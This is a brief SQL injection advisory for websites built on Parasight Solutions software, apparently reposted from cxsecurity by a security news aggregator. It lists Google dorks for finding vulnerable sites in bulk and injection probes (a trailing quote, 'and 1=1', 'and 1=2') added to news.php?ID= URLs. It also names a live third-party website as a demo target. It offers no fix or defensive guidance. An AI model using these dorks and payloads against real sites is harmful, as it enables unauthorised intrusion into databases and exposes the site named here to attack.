Parasight Solutons SQL Injection
2020-11-08 17:56:53 Author: cxsecurity.com(查看原文) 阅读量:340 收藏

[+] Title: Parasight Solutons SQL Injection [+] Author: h4shur [+] date:2020-11-08 [+] Vendor Homepage: http://www.parasightsolutions.com/ [+] Software Link: http://www.parasightsolutions.com/ [+] Tested on: Windows 10 & Google Chrome [+] Category : Web Application Bugs [+} Dork : intext:"Powered By Parasight Solutons" intext:"Powered By Parasight Solutons" inurl:"NEWS.php?ID=" intext:"Powered By Parasight Solutons" inurl:"php?ID=" ### Note: [+] Add the quotation mark (') to the end of the link : * Target.com/news.php?ID=4' [+] First add "and 1=1" and then "and 1=2" to the end of the link : * Target.com/news.php?ID=4 and 1=1 * Target.com/news.php?ID=4 and 1=2 ### Demo: [+] http://jamesmackintosh.com/news.php?id=9 ### Contact Me : * Email : [email protected] * twitter : @h4shur * Telegram : @h4shur * Instagram : @netedit0r


文章来源: https://cxsecurity.com/issue/WLB-2020110047
如有侵权请联系:admin#unsafe.sh